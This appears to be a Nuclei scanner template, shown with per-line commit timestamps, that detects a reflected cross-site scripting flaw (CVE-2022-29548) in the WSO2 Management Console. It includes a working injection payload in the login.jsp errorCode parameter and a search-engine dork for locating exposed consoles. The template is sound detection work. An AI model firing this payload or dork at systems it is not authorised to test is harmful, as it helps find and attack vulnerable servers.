2022-05-09 10:25:53 +00:00
id : CVE-2022-29548
info :
2022-09-16 19:50:10 +00:00
name : WSO2 - Cross-Site Scripting
2022-05-09 10:25:53 +00:00
author : edoardottt
2022-09-16 20:03:07 +00:00
severity : medium
2022-05-09 17:01:59 +00:00
description : |
2022-09-16 19:50:10 +00:00
WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0.
2022-05-09 17:01:59 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603
2022-09-16 19:50:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-29548
2022-09-16 20:03:07 +00:00
- http://packetstormsecurity.com/files/167587/WSO2-Management-Console-Cross-Site-Scripting.html
2022-05-09 10:25:53 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-29548
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2022-05-09 10:25:53 +00:00
metadata :
2022-09-08 22:39:14 +00:00
google-query : inurl:"carbon/admin/login"
2022-06-28 13:05:52 +00:00
verified : "true"
2022-09-17 08:33:33 +00:00
tags : cve,cve2022,wso2,xss,packetstorm
2022-05-09 10:25:53 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"
matchers-condition : and
matchers :
2022-05-09 17:01:59 +00:00
- type : word
part : body
words :
- "CARBON.showWarningDialog('???');alert(document.domain)//???"
2022-05-09 10:25:53 +00:00
- type : word
part : header
words :
- "text/html"
2022-05-09 17:01:59 +00:00
- type : status
status :
- 200
2022-09-16 19:50:10 +00:00
# Enhanced by mp on 2022/09/14